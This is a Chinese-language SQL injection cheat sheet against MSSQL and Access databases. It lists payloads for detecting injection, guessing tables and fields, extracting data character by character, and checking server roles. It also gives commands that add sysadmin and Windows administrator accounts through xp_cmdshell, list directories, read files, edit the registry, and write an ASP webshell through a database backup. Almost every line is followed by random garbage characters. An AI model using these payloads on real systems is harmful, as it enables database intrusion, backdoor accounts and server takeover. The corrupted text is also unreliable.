1.判断是否有注入;and 1=1 ;and 1=2 7t`�<`BY^
2.初步判断是否是mssql ;and user>0 Mp;��t�?C4
HRi�~�TZ?\
3.注入参数是字符'and [查询条件] and ''=' D�4'"�GaCv
m�tuq�����
4.搜索时没过滤参数的'and [查询条件] and '%25'=' g(<02t!OT=
�m3XL;1y:a
5.判断数据库系统 �B#�o(2�1s
Dr6"~5~9w�
;and (select count(*) from sysobjects)>0 mssql t�+Mr1�e��
X�P5q�4BM�
;and (select count(*) from msysobjects)>0 access �=:`1!W0�I
T_�Q/�KhLU
3� �2Q/4�
[�YP8�z��~
6.猜数据库 ;and (select Count(*) from [数据库名])>0 A@*P4E`xp
��A�$ %5�l
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��G;61�5p1
@va{&i`%A7
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ZmO/6_�nU?
�?6��C�bx6
9.(1)猜字段的ascii值(access) uo�FH{.�)
#/sK�b�2eQ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 u,[�Yaw�"L
�)/2*� <jr
(2)猜字段的ascii值(mssql) jo=X���x�A
y=�YD4m2�W
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 &Th/Q�v}�[
�&5��/`6-K
10.测试权限结构(mssql) �g#`�(&
�k
$/,qw��
�
3?Y%�|ZV�M
(xK�=/()}q
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- rgI�LOt�k[
7;Km�J�}�$
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �|�Z6rP-��
T�
:CsYj1
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- $�f>M�z|�j
VY<v?Of
i-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- : QSl��ctW
CZ��E5RzG�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �t)��g1ICt
Zb-T�CS+3l
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &�9Pz��Bc
�xuO5|{��h
;and 1=(select IS_MEMBER('db_owner'));-- o�L���k>|J
�a}`4BM�i3
U��Y
��j
JI� ��)��+
11.添加mssql和系统的帐户 �1�Y@��6oT
gj\r���>~S
;exec master.dbo.sp_addlogin username;-- ;3Fg��y8�T
;exec master.dbo.sp_password null,username,password;-- eB�/�3MUz1
VJD$nh
#M5
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N::_JH?�^=
`y0ZFh1>X�
;exec master.dbo.xp_cmdshell 'net user username password 0��0?^!�';
&�b��h?jW�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K>F�o+f��
nl�H���H}K
;exec master.dbo.xp_cmdshell 'net user username password /add';-- k�P%'�{���
X1:|� ��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- UBp�YR>
<\
�Rg<y8~|'}
�A)�040�n
�G�hLg��V�
12.(1)遍历目录 �C2AP� ���
(r�t� �D�T
;create table dirs(paths varchar(100), id int) Um;�ReJ�8z
sq*�R�)�cZ
;insert dirs exec master.dbo.xp_dirtree 'c:\' U/y�YQ�Z\)
56u'XMB?�
;and (select top 1 paths from dirs)>0 ckP&N��:tC
k���o
im@B
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1 dz&J\|E#
/-E>5��w�U
tb�AN�{pX�
~zRUJ2h�D!
(2)遍历目录 PmvTC�fsg�
Gw�!��jYnU
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ")�o�w,r^"
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 )��<D�L'��
:~:(4�9l��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Y1{6lh�xgE
E8jdQS�|i�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &AGV0{NMh]
&�k��&tk�E
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 HCb�7�`(�@
��gsc/IU�k
%�,a.431gi
:�CSys6�2�
13.mssql中的存储过程 �[H�t�U-8:
l+�kI4B7--
xp_regenumvalues 注册表根键, 子键 -{pcb7.xuv
$]\N/}1�v
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ]5x N^7_!j
K�m��E���m
xp_regread 根键,子键,键值名 7�\���JRHw
p}R)qz-=5U
;exec xp_regread �P�Lg�`\�|
p4<&�N�MG�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `iv,aQ�� '
&kXf)xc<~�
xp_regwrite 根键,子键, 值名, 值类型, 值 )e�Y�3[>`�
-�[`,MZf��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 U�;;vNzcn�
�0u
QqPF t
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 FlD��
!�?�
& @^|�=>L�
xp_regdeletevalue 根键,子键,值名 �DDN�#�w<#
�5�Tb93Q@c
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 }OI�;M�^5L
� �s4;�SA�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 q3�T'rw%Eh
?5'U�rqYSW
<bXfjj6YJ@
"1&C\}.�7�
14.mssql的backup创建webshell #�]:yCiA��
U|u�v�SJ)X
use model `�DC)U1���
�G~8C7$�0z
create table cmd(str image); ~7� C` a$�
�f�ph*|T&R
insert into cmd(str) values (''); epW�;]>
�l
!(w\%$��|�
backup database model to disk='c:\l.asp'; 7tUl$H;I/R
q,^^c��1f�
)+�N%!(ki�
^&h|HO-��5
15.mssql内置函数 a)Qx4�3mOS
o9<jj>�R;
;and (select @@version)>0 获得Windows的版本号 r?\hZ�*�|M
@/`b:sv�&*
;and user_name()='dbo' 判断当前系统的连接用户是不是sa <{9E.�6G`n
[US.n�+G�6
;and (select user_name())>0 爆当前系统的连接用户 fwf]1@#���
;l� &mA�1+
;and (select db_name())>0 得到当前连接的数据库 O�Y51~�#BF
'd|_�i6:y&
jv5p_v4�%O
u(\b1h n��
16.简洁的webshell +<Uc42i�7n
.�?[2,4�F;
use model ^B1Q";#
B^
+�*DXz�VC�
create table cmd(str image); .B"�h6WMz�
].
IUQ�*4t
insert into cmd(str) values (''); /�"~CWN��a
i=o<\�{iV:
backup database model to disk='g:\wwwtest\l.asp';
